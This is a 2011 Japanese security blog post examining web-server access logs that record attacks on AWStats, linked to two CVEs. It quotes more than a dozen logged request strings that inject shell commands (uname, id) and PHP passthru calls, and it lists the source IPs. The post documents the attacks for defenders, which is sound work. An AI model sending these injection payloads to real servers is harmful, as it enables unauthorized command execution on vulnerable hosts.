最近のアクセスログ - awstatへの攻撃
Published: 2011/12/28
これも多いです。
このへんですかね?
- CVE-2005-0116
- CVE-2008-3922
狙われているのは古めの脆弱性。
昔からawstatが動いているけど放置されたままのサーバーやVPS利用者は多そうですから、狙い目なのかもしれません。
たしかに最近のdrive-byを利用した攻撃等でマルウェアや攻撃スクリプトの設置場所にawstatがある例が多々あるのですが、それとリンクしているのかもしれません。
(awstatのお陰でマルウェア配付の統計情報が見えるので便利なのですが。。。。。)
リクエスト内容はこのような感じ。
/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /awstats/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d /awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d /awstatstotals/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d /cgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;;echo%20YYY;echo| /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /cgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /cgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /scgi-bin/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /scgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /scgi-bin/stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /scgi/awstats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /scripts/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo| /stat/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d /stats/awstats.pl?configdir=|echo;echo%20YYYAAZ;uname;id;echo%20YYY;echo|
攻撃元は同じくアジア(珍しくドイツが一つ)。一連の攻撃は同じ攻撃元なのでしょう。
IP | name | AS | AS name | 国 | |
---|---|---|---|---|---|
202.100.80.21 | NONE | 4134 | CHINANET-BACKBONE_No.31Jin-rong_Street | CN | |
59.108.108.100 | NONE | 4847 | CNIX-AP_China_Networks_Inter-Exchange | CN | |
203.72.59.6 | NONE | 1659 | ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_Center | TW | |
188.40.106.11 | nps1.newsletter-providing.com. | 24940 | HETZNER-AS_Hetzner_Online_AG_RZ | DE |
by jyake